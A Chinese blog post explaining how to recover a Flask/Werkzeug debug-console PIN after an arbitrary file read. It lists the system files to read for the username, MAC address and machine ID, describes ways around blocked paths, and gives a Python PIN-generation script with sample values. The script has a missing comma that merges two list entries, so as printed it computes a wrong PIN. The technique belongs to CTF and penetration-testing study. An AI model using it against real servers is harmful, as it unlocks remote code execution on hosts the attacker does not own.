pin码是flask在开启debug模式下,进行代码调试模式所需的进入密码,需要正确的PIN码才能进入调试模式.
对于pin码运算方法的描述如下
pin码生成要六要素
1.username 在可以任意文件读的条件下读 /etc/passwd进行猜测
2.modname 默认flask.app
3.appname 默认Flask
4.moddir flask库下app.py的绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量
5.uuidnode mac地址的十进制,任意文件读 /sys/class/net/eth0/address
6.machine_id 机器码 这个待会细说,一般就生成pin码不对就是这错了
machine_id是由/etc/machine-id
,/proc/sys/kernel/random/boot_id
,/proc/self/cgroup
拼接而成的.
如果self被禁用可以用1来绕过,cgroup被禁用可以使用mountinfo
或者cpuset
去绕过.
在python3.8及以后使用的哈希算法为sha1,以前使用的是md5,新版脚本如下.
import hashlib
from itertools import chain
def mac_10():
"""
/sys/class/net/eth0/address mac地址十进制
:return:
"""
mac_address = "02:42:c0:a8:10:02"
# 将MAC地址视为一个十六进制数(去掉冒号)
value = int(mac_address.replace(":", ""), 16)
return str(value)
probably_public_bits = [
'app' # username
'flask.app', # modname
'Flask', # appname
'/usr/local/lib/python3.9/site-packages/flask/app.py' # moddir
]
machine_id = '6ee8d0b5126041a1b3ddfefb9ea61b4e'
boot_id = '70d3d850-a8d2-4ff1-a285-34c4a401e57d'
c_group = '0::/'
id = ''
if machine_id:
id += machine_id.strip()
else:
id += boot_id.strip()
id += c_group.strip().rpartition('/')[2]
private_bits = [
mac_10(), # mac地址
id #machin-id
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode("utf-8")
h.update(bit)
h.update(b"cookiesalt")
cookie_name = f"__wzd{h.hexdigest()[:20]}"
# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]
# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = "-".join(
num[x: x + group_size].rjust(group_size, "0")
for x in range(0, len(num), group_size)
)
break
else:
rv = num
print(rv)
标签:group,pin,flask,mac,num,bit,id
From: https://www.cnblogs.com/meraklbz/p/18515644